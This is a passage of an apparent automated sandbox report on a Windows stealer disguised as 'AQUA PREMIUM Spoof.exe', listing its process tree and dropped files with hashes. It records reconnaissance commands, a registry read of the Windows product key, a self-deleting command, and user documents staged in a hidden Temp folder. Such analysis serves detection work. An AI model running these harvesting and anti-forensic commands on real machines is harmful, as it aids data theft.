                                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                    3⤵
                                                                      PID:528
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic os get Caption
                                                                        4⤵
                                                                          PID:1980
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                        3⤵
                                                                          PID:4340
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic computersystem get totalphysicalmemory
                                                                            4⤵
                                                                              PID:4404
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                            3⤵
                                                                              PID:4040
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic csproduct get uuid
                                                                                4⤵
                                                                                  PID:5020
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                3⤵
                                                                                  PID:1408
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                    4⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:4368
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                  3⤵
                                                                                    PID:3580
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic path win32_VideoController get name
                                                                                      4⤵
                                                                                      • Detects videocard installed
                                                                                      PID:2252
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                    3⤵
                                                                                      PID:1204
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                        4⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:4388
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe""
                                                                                      3⤵
                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                      PID:1208
                                                                                      • C:\Windows\system32\PING.EXE
                                                                                        ping localhost -n 3
                                                                                        4⤵
                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                        • Runs ping.exe
                                                                                        PID:4532
                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  1⤵
                                                                                    PID:3324

                                                                                  Network

                                                                                  MITRE ATT&CK Enterprise v15

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                    Filesize

                                                                                    2KB

                                                                                    MD5

                                                                                    d85ba6ff808d9e5444a4b369f5bc2730

                                                                                    SHA1

                                                                                    31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                    SHA256

                                                                                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                    SHA512

                                                                                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Filesize

                                                                                    944B

                                                                                    MD5

                                                                                    6d42b6da621e8df5674e26b799c8e2aa

                                                                                    SHA1

                                                                                    ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                                    SHA256

                                                                                    5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                                    SHA512

                                                                                    53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Filesize

                                                                                    944B

                                                                                    MD5

                                                                                    ba169f4dcbbf147fe78ef0061a95e83b

                                                                                    SHA1

                                                                                    92a571a6eef49fff666e0f62a3545bcd1cdcda67

                                                                                    SHA256

                                                                                    5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

                                                                                    SHA512

                                                                                    8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Filesize

                                                                                    1KB

                                                                                    MD5

                                                                                    d4154a892a07b07da27746ed39e8ef5d

                                                                                    SHA1

                                                                                    f45db8a86dd4ff4a76c1929d946507db8594d6a5

                                                                                    SHA256

                                                                                    3ea93c6f19fb845797177d3a4513108e58a2d23def933f68f70fdc7300cbf759

                                                                                    SHA512

                                                                                    57405365db52735ba3a989bdab9281c2c5a835cc938b89831b328412b7f563396966ae4d9a5f187d81ec08b7aa287b2facbf732ed156ad29e246b0e71a7f2245

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Filesize

                                                                                    1KB

                                                                                    MD5

                                                                                    88be3bc8a7f90e3953298c0fdbec4d72

                                                                                    SHA1

                                                                                    f4969784ad421cc80ef45608727aacd0f6bf2e4b

                                                                                    SHA256

                                                                                    533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

                                                                                    SHA512

                                                                                    4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RESBBAF.tmp

                                                                                    Filesize

                                                                                    1KB

                                                                                    MD5

                                                                                    9bb2d22d766d140d6fea592b2023a3de

                                                                                    SHA1

                                                                                    a42dc3eb566e44e6f4cdbe268fe609c3459e7dd9

                                                                                    SHA256

                                                                                    4163a72691e4353ee743dc5e229b6956321fedb1cc5c31fa248eb22c5adef3a1

                                                                                    SHA512

                                                                                    c01ceea103f610ae72ea6ab9ca0bd6c24a892f132bcea318b6f64b2e6e1b5a42ee8e504333b4d6c2cae7487e93c61ee6f6c0835697fe7db6101c9661e7ce8ade

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\VCRUNTIME140.dll

                                                                                    Filesize

                                                                                    95KB

                                                                                    MD5

                                                                                    f34eb034aa4a9735218686590cba2e8b

                                                                                    SHA1

                                                                                    2bc20acdcb201676b77a66fa7ec6b53fa2644713

                                                                                    SHA256

                                                                                    9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1

                                                                                    SHA512

                                                                                    d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\_bz2.pyd

                                                                                    Filesize

                                                                                    47KB

                                                                                    MD5

                                                                                    f6e387f20808828796e876682a328e98

                                                                                    SHA1

                                                                                    6679ae43b0634ac706218996bac961bef4138a02

                                                                                    SHA256

                                                                                    8886bd30421c6c6bfae17847002b9bf4ee4d9eee1a3be7369ee66b36e26c372b

                                                                                    SHA512

                                                                                    ad7cf281f2d830f9dbf66d8ef50e418b4a17a0144b6616c43d7e98b00e6f0cbafc6fe4aba4fabf2f008bb0df85553614b38ae303e5726621a804051d950e744e

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\_ctypes.pyd

                                                                                    Filesize

                                                                                    58KB

                                                                                    MD5

                                                                                    48ce90022e97f72114a95630ba43b8fb

                                                                                    SHA1

                                                                                    f2eba0434ec204d8c6ca4f01af33ef34f09b52fd

                                                                                    SHA256

                                                                                    5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635

                                                                                    SHA512

                                                                                    7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\_decimal.pyd

                                                                                    Filesize

                                                                                    105KB

                                                                                    MD5

                                                                                    2030438e4f397a7d4241a701a3ca2419

                                                                                    SHA1

                                                                                    28b8d06135cd1f784ccabda39432cc83ba22daf7

                                                                                    SHA256

                                                                                    07d7ac065f25af2c7498d5d93b1551cc43a4d4b5e8fb2f9293b647d0f7bd7c72

                                                                                    SHA512

                                                                                    767f2a9f9eef6ebeca95ab9652b7d0976f2ac87b9e9da1dbd3c4ccf58e8ecb0da8242f4df0b07612282c16ba85197ed0296d1052027cd48b96d61bdf678abaad

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\_hashlib.pyd

                                                                                    Filesize

                                                                                    35KB

                                                                                    MD5

                                                                                    13f99120a244ab62af1684fbbc5d5a7e

                                                                                    SHA1

                                                                                    5147a90082eb3cd2c34b7f2deb8a4ef24d7ae724

                                                                                    SHA256

                                                                                    11658b52e7166da976abeeed78a940d69b2f11f518046877bea799759a17f58b

                                                                                    SHA512

                                                                                    46c2f9f43df6de72458ed24c2a0433a6092fd5b49b3234135f06c19a80f18f8bdbfb297e5a411cf29f8c60af342c80db123959f7317cfa045c73bd6f835eb22d

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\_lzma.pyd

                                                                                    Filesize

                                                                                    85KB

                                                                                    MD5

                                                                                    7c66f33a67fbb4d99041f085ef3c6428

                                                                                    SHA1

                                                                                    e1384891df177b45b889459c503985b113e754a3

                                                                                    SHA256

                                                                                    32f911e178fa9e4db9bd797598f84f9896f99e5022f2b76a1589b81f686b0866

                                                                                    SHA512

                                                                                    d0caabd031fa0c63f4cfb79d8f3531ad85eda468d77a78dd3dde40ce9ac2d404fc0099c4f67579aa802fe5c6c6a464894fd88c19f1fc601f26189780b36f3f9d

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\_queue.pyd

                                                                                    Filesize

                                                                                    25KB

                                                                                    MD5

                                                                                    f9d8b75ccb258b8bc4eef7311c6d611d

                                                                                    SHA1

                                                                                    1b48555c39a36f035699189329cda133b63e36b5

                                                                                    SHA256

                                                                                    b3d9763fc71b001a1a2cc430946933e3832f859eb7857b590f8daeef8017179c

                                                                                    SHA512

                                                                                    cbf8490501b002eec96ae6c1fa4f3684aa1cab1e63025087df92c0e857299b9b498bff91c1f301f926ff86e0dc81e8f0c17db992366bed3cd9f41bcae43542db

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\_socket.pyd

                                                                                    Filesize

                                                                                    42KB

                                                                                    MD5

                                                                                    0dd957099cf15d172d0a343886fb7c66

                                                                                    SHA1

                                                                                    950f7f15c6accffac699c5db6ce475365821b92a

                                                                                    SHA256

                                                                                    8142d92dc7557e8c585ea9ee41146b77864b7529ed464fdf51dfb6d797828a4a

                                                                                    SHA512

                                                                                    3dc0380dfc871d8cab7e95d6119f16be2f31cdde784f8f90ffddd6a43323a2988c61e343eede5e5cb347fc2af594fe8d8944644396faf2e478a3487bcf9cf9ee

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\_sqlite3.pyd

                                                                                    Filesize

                                                                                    49KB

                                                                                    MD5

                                                                                    dde6bab39abd5fce90860584d4e35f49

                                                                                    SHA1

                                                                                    23e27776241b60f7c936000e72376c4a5180b935

                                                                                    SHA256

                                                                                    c84e5f739ce046b4582663a3017f31fe9ae5e706e087ac4c5ff11c7bba07b5f9

                                                                                    SHA512

                                                                                    8190c6befbe660096363409cb82977e9dce5ab9a78c60f3d3db9dc08a2300504f9b2058d8cfb740d7a17995267d8005392ee0f1a03fb74030286fbc7a9c287de

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\_ssl.pyd

                                                                                    Filesize

                                                                                    62KB

                                                                                    MD5

                                                                                    a4dba3f258344390ee9929b93754f673

                                                                                    SHA1

                                                                                    75bbf00e79bb25f93455a806d0cd951bdd305752

                                                                                    SHA256

                                                                                    e0aa8cfa2e383820561bce2aee35b77a6902ff383076c237c7859cd894d37f49

                                                                                    SHA512

                                                                                    6201e0d840f85d1627db849bfaf4a32f6fc0634a16416074fe6d13329317520b0a06806ad3337a3370dcc1c1e3d1910d18c823c6a7a62efe400de36b28d1767a

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\base_library.zip

                                                                                    Filesize

                                                                                    859KB

                                                                                    MD5

                                                                                    3ae8624c9c1224f10a3135a7039c951f

                                                                                    SHA1

                                                                                    08c18204e598708ba5ea59e928ef80ca4485b592

                                                                                    SHA256

                                                                                    64dfc4067a99c71094b4a9aa8e50344e7d42ea9a0d376cbcd419c04e53384285

                                                                                    SHA512

                                                                                    c47ea6b8e004c27fa29e84f6363f97e775c83a239eb3ae75dedca79e69db02b431a586877ee8f948f83b522b00c20e6b1d5864628c2aef9e33e0be95fe6e3254

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\blank.aes

                                                                                    Filesize

                                                                                    79KB

                                                                                    MD5

                                                                                    5fd29f5fbc655b71fbeb218e5a7ea82f

                                                                                    SHA1

                                                                                    2cdab6b0d43ae774388967a2e04dbbefc6daa95a

                                                                                    SHA256

                                                                                    1a12ecda1141350d41d3fb09e7c290480ffb0e04c4f11ec2cf9361885f86d33a

                                                                                    SHA512

                                                                                    9760800ff16c6332f59ee89b5e8a800d181ae06c713ecb851379decbac0fd0eb8909c1868106493df1bd1280a27f49bbc385cc6cab160f834b78bd03554be250

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\libcrypto-1_1.dll

                                                                                    Filesize

                                                                                    1.1MB

                                                                                    MD5

                                                                                    e5aecaf59c67d6dd7c7979dfb49ed3b0

                                                                                    SHA1

                                                                                    b0a292065e1b3875f015277b90d183b875451450

                                                                                    SHA256

                                                                                    9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1

                                                                                    SHA512

                                                                                    145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\libffi-7.dll

                                                                                    Filesize

                                                                                    23KB

                                                                                    MD5

                                                                                    6f818913fafe8e4df7fedc46131f201f

                                                                                    SHA1

                                                                                    bbb7ba3edbd4783f7f973d97b0b568cc69cadac5

                                                                                    SHA256

                                                                                    3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56

                                                                                    SHA512

                                                                                    5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\libssl-1_1.dll

                                                                                    Filesize

                                                                                    203KB

                                                                                    MD5

                                                                                    7bcb0f97635b91097398fd1b7410b3bc

                                                                                    SHA1

                                                                                    7d4fc6b820c465d46f934a5610bc215263ee6d3e

                                                                                    SHA256

                                                                                    abe8267f399a803224a1f3c737bca14dee2166ba43c1221950e2fbce1314479e

                                                                                    SHA512

                                                                                    835bab65d00884912307694c36066528e7b21f3b6e7a1b9c90d4da385334388af24540b9d7a9171e89a4802612a8b6523c77f4752c052bf47adbd6839bc4b92c

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\python310.dll

                                                                                    Filesize

                                                                                    1.4MB

                                                                                    MD5

                                                                                    3f782cf7874b03c1d20ed90d370f4329

                                                                                    SHA1

                                                                                    08a2b4a21092321de1dcad1bb2afb660b0fa7749

                                                                                    SHA256

                                                                                    2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6

                                                                                    SHA512

                                                                                    950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\rar.exe

                                                                                    Filesize

                                                                                    615KB

                                                                                    MD5

                                                                                    9c223575ae5b9544bc3d69ac6364f75e

                                                                                    SHA1

                                                                                    8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                    SHA256

                                                                                    90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                    SHA512

                                                                                    57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\rarreg.key

                                                                                    Filesize

                                                                                    456B

                                                                                    MD5

                                                                                    4531984cad7dacf24c086830068c4abe

                                                                                    SHA1

                                                                                    fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                                    SHA256

                                                                                    58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                                    SHA512

                                                                                    00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\select.pyd

                                                                                    Filesize

                                                                                    25KB

                                                                                    MD5

                                                                                    5c66bcf3cc3c364ecac7cf40ad28d8f0

                                                                                    SHA1

                                                                                    faf0848c231bf120dc9f749f726c807874d9d612

                                                                                    SHA256

                                                                                    26dada1a4730a51a0e3aa62e7abc7e6517a4dc48f02616e0b6e5291014a809cc

                                                                                    SHA512

                                                                                    034cd4c70c4e0d95d6bb3f72751c07b8b91918aabe59abf9009c60aa22600247694d6b9e232fefff78868aad20f5f5548e8740659036096fab44b65f6c4f8db6

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\sqlite3.dll

                                                                                    Filesize

                                                                                    622KB

                                                                                    MD5

                                                                                    ad4bcb50bb8309e4bbda374c01fab914

                                                                                    SHA1

                                                                                    a299963016a3d5386bf83584a073754c6b84b236

                                                                                    SHA256

                                                                                    32c0978437c9163bb12606607e88701dd79400cdde926d890cdbf6334c2b8435

                                                                                    SHA512

                                                                                    ba6bfa3c27fa4285eeb2978ff17cba94375d84d7c0f79150d1f2f7163c80c347b84d712da83435e8d13e27ed59ea0375edb5af2ea1ba67b2c77b6dfcb62ad65a

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI40162\unicodedata.pyd

                                                                                    Filesize

                                                                                    289KB

                                                                                    MD5

                                                                                    dfa1f0cd0ad295b31cb9dda2803bbd8c

                                                                                    SHA1

                                                                                    cc68460feae2ff4e9d85a72be58c8011cb318bc2

                                                                                    SHA256

                                                                                    46a90852f6651f20b7c89e71cc63f0154f00a0e7cd543f046020d5ec9ef6cb10

                                                                                    SHA512

                                                                                    7fbdfd56e12c8f030483f4d033f1b920968ea87687e9896f418e9cf1b9e345e2be2dc8f1ea1a8afb0040a376ffb7a5dc0db27d84fb8291b50e2ed3b10c10168e

                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o3srppl4.iwa.ps1

                                                                                    Filesize

                                                                                    60B

                                                                                    MD5

                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                    SHA1

                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                    SHA256

                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                    SHA512

                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                  • C:\Users\Admin\AppData\Local\Temp\grsjam1a\grsjam1a.dll

                                                                                    Filesize

                                                                                    4KB

                                                                                    MD5

                                                                                    b531329499e09eb37cf8f875e0e5e4ed

                                                                                    SHA1

                                                                                    8d6a0478d0d793cd138f07612108c7fbc4594d62

                                                                                    SHA256

                                                                                    1a41bf65e6100c399202ba82870abcee860218a33e2802ddd2ac39fc1c526c32

                                                                                    SHA512

                                                                                    0f8c6fcc4222752a5d7d64913cb3bf966b82cbc70419705654d1a2c5ef8b8f23dead18eb5f56e2ec25ee7c1abc1097792d740aba2deb6421f80687ebec851a1e

                                                                                  • C:\Users\Admin\AppData\Local\Temp\      ​‏‏​\Common Files\Desktop\BackupWrite.csv

                                                                                    Filesize

                                                                                    287KB

                                                                                    MD5

                                                                                    f6d9826094d29df67db44d4a6d4dc93d

                                                                                    SHA1

                                                                                    57f0643e803f77d6150ee656e22224032824930a

                                                                                    SHA256

                                                                                    c27315a45ea3c7b4cd5cc71fd23e289edd04b7feb6c08072faa0dddf520b712a

                                                                                    SHA512

                                                                                    065360b87bae12ecbf9b21b59166c36120918ad1be38591db708130aacdaebab60987438c10e9dffe0cab3cc3113459470eb625bb31d9d7becf57130f7082e00

                                                                                  • C:\Users\Admin\AppData\Local\Temp\      ​‏‏​\Common Files\Desktop\ConfirmRequest.docx

                                                                                    Filesize

                                                                                    15KB

                                                                                    MD5

                                                                                    8eeee0b5810c78dc3fe4a7acb52626fd

                                                                                    SHA1

                                                                                    72aa9da91b8422d2bf8d79d94336bbb46b977467

                                                                                    SHA256

                                                                                    d94086d30a3a1385891c48f38a54741a27cc1d8197f69d1b0da6297a1977143e

                                                                                    SHA512

                                                                                    86f8092a37942233a96500ad53cfdec8daefe5b3b91dbbb8b5c498fdb339b45365e08245a03f92edca2d3b5d382a7f04027ad890e6a64d649964ab47d4f70d73

                                                                                  • C:\Users\Admin\AppData\Local\Temp\      ​‏‏​\Common Files\Desktop\DismountMeasure.docx

                                                                                    Filesize

                                                                                    16KB

                                                                                    MD5

                                                                                    6afd746ba2a735a84fcb4217866ef431

                                                                                    SHA1

                                                                                    969b91e1a5e25976eb842e1ebb670250a6256f91

                                                                                    SHA256

                                                                                    01f711d6d1c43a828e8fae61d31f0b930266141097ce0d048e6c4d05216f2b84

                                                                                    SHA512

                                                                                    ba6fa3373b0ace5c268f16826891c43b9bd74e13979682e11cb79bc5dd5aa767c40b34e22b092967c8a79e05b780a50b7d5dff3d8dbf1b63fe562af8d97315e1

                                                                                  • C:\Users\Admin\AppData\Local\Temp\      ​‏‏​\Common Files\Desktop\MeasureSend.docx

                                                                                    Filesize

                                                                                    16KB

                                                                                    MD5

                                                                                    7f58b24ab42341a19a01e14f4fe4f8b7

                                                                                    SHA1

                                                                                    aee232ea699297b3f1f1c785af061ae4677b7860

                                                                                    SHA256

                                                                                    30358bcf8de899c58b03775db8f62a2f8dc7986e190af814c69415aa931cfa9c

                                                                                    SHA512

                                                                                    1afd1ca834716394c3cc5fa1f8831f7a5926c1be078b3c5c771774caea9ffa6870efd8eb453df8ae0f3ffbecb8fdb38f1b6ea13ad9454cf7f27813c37791c24b

                                                                                  • C:\Users\Admin\AppData\Local\Temp\      ​‏‏​\Common Files\Desktop\PopSkip.doc

                                                                                    Filesize

                                                                                    272KB

                                                                                    MD5

                                                                                    db6efe9f8d80ff5e23aea0cc3bdaebaf

                                                                                    SHA1

                                                                                    c3dc719e4f987d04b8c624c2767fd1f7f4ebedc3

                                                                                    SHA256

                                                                                    f2fed7c3b2aa1449e1a8ad9b18e5652dfba2b21f7b3b1d87952a8b3d0c17071c

                                                                                    SHA512

                                                                                    467e78322b03675abe120aaec9032c47d5fb56b17857f1fffbd646db84a2a95dc18a6a9b2292bf04ecf48e63c61874859c911c51db13be512371451a4e537452

                                                                                  • C:\Users\Admin\AppData\Local\Temp\      ​‏‏​\Common Files\Desktop\RenameEdit.xlsx

                                                                                    Filesize

                                                                                    10KB

                                                                                    MD5

                                                                                    1ff418aca5c0b6bf30f04ca33e4e65cf

                                                                                    SHA1

                                                                                    2c25db4375ed9f899c7b4e20235a0f811254600f

                                                                                    SHA256

                                                                                    2d7375eec2241d5505ec49126fcde31625321f9a2edf77cbf342af028b87d232

                                                                                    SHA512

                                                                                    de6605d6df0606914822b3279e9f014fe7543b38e26af2d9fe5cb148e6dcb840eddc2a2f24686137bbc91532f97eb52b90b99c872893793dc3be870f0494f2f0

                                                                                  • C:\Users\Admin\AppData\Local\Temp\      ​‏‏​\Common Files\Documents\BackupResolve.txt

                                                                                    Filesize

                                                                                    1.1MB

                                                                                    MD5

                                                                                    4a72f2e932078257c2246dfd43fe288a

                                                                                    SHA1

                                                                                    9a4f386f7eb1f6d70d3e40116a62e7287efcb5f0

                                                                                    SHA256

                                                                                    92a3aa70e63df62f2d3eb2cb79853d7fa4ddf458ff434b717aea6f1a0c9d62ad

                                                                                    SHA512

                                                                                    a5a4d24b178e6a2df023e5b5a3cee0a3b1e6802263f85f30439cbd4cf575390c39e3e0ae71338489a8d8266146d81752ab74329ba206f6e958ff8b1287607ba5

                                                                                  • C:\Users\Admin\AppData\Local\Temp\      ​‏‏​\Common Files\Documents\ExitResize.xlsx

                                                                                    Filesize

                                                                                    10KB

                                                                                    MD5

                                                                                    f44970b14bbfae068b562e0e42c28a09

                                                                                    SHA1

                                                                                    39e29251987da7c03bf94fb4b552336c8107f21c

                                                                                    SHA256

                                                                                    14de95e902c769fe08b93be63a318ca63dbeae06c54b3c2b1dbbd0dafeb23f77

                                                                                    SHA512

                                                                                    2064921e798fdbabf6b8e5fbf1778c1fbced3a17df848d6cc37074842ce7150ffff037afc90b1fd5f04bba17d97890cf2002d17e102e17722df8eca086a52f7a

                                                                                  • C:\Users\Admin\AppData\Local\Temp\      ​‏‏​\Common Files\Documents\OpenAdd.docx

                                                                                    Filesize

                                                                                    21KB

                                                                                    MD5

                                                                                    02d7a9e7369de5efa59361772cb5883c

                                                                                    SHA1

                                                                                    ec122ad2c2219c4b2a0f3790aa4b14e896a30ec0

                                                                                    SHA256

                                                                                    7a37d4525d1c5de726e5aaabb094ffb009ccb04eb436381a36a3fdc53787c7ec

                                                                                    SHA512

                                                                                    e3dfe38678049a8bd76fd67264755e11011b59708dd2a8d6030544881f40407fdad5827116989dde8a49216691b881a9ae9190d48dd430134179b1ae9aa48fd9

                                                                                  • C:\Users\Admin\AppData\Local\Temp\      ​‏‏​\Common Files\Documents\PingMount.docx

                                                                                    Filesize

                                                                                    16KB

                                                                                    MD5

                                                                                    f85d125362c640dea480a8d4909b1c60

                                                                                    SHA1

                                                                                    401905b14220ea1f11843d7b5bba7ee8b22b6ee7

                                                                                    SHA256

                                                                                    8fc15a9ccc348ef9b031cde084123c440173eed7a0b1f2187cef9fcfe528c931

                                                                                    SHA512

                                                                                    1c9ab046f1d7f01807b025328f53cc3b2fe48622275e56730662565f7ce1ae679d5dfe1d26914a51d61805d30bd7ad08cd6b25d335849938f2f6769500076217

                                                                                  • C:\Users\Admin\AppData\Local\Temp\      ​‏‏​\Common Files\Documents\PushConnect.xlsx

                                                                                    Filesize

                                                                                    11KB

                                                                                    MD5

                                                                                    52367eead913ccbf9a09cfa90727978b

                                                                                    SHA1

                                                                                    14531b9cb714d4d643159eb3a110191c2739b91d

                                                                                    SHA256

                                                                                    341eaec201735464d59f5d417ac2ec0efc5cfa57781104c898bcafdb355c466b

                                                                                    SHA512

                                                                                    2d6be6b0ee2e9e93e6ed8afc71b3e35bd61ed1df230b3322532dfacd64ae799d25dd86b2fe82e585977a4d11a1ef9c10fe10088051859d300a890651ea44fa7d

                                                                                  • C:\Users\Admin\AppData\Local\Temp\      ​‏‏​\Common Files\Documents\TestRedo.docx

                                                                                    Filesize

                                                                                    17KB

                                                                                    MD5

                                                                                    76c931e1e8e00a52649792dfe37215f5

                                                                                    SHA1

                                                                                    27fd8f6a35a93c0904de7f590bc8af3cafe2289f

                                                                                    SHA256

                                                                                    a0625ec8b8819242575b3e066bdf616c37a0dbae7797c345973f51be5ab13524

                                                                                    SHA512

                                                                                    fc95c6211e5be703e2188eb87080f1853f0fb4a4f823d62dece32d695befd83cd9b608d4973728cc966dc08a1c100f677050a2f429a4bbe05b87778240e4878f

                                                                                  • C:\Windows\System32\drivers\etc\hosts

                                                                                    Filesize

                                                                                    2KB

                                                                                    MD5

                                                                                    f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                                    SHA1

                                                                                    e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                                    SHA256

                                                                                    a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                                    SHA512

                                                                                    c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\grsjam1a\CSC15AD2832CD304B50BD1D4DB7EEA0BCA.TMP

                                                                                    Filesize

                                                                                    652B

                                                                                    MD5

                                                                                    0d734559b1ce2af57f2d236fafe38046

                                                                                    SHA1

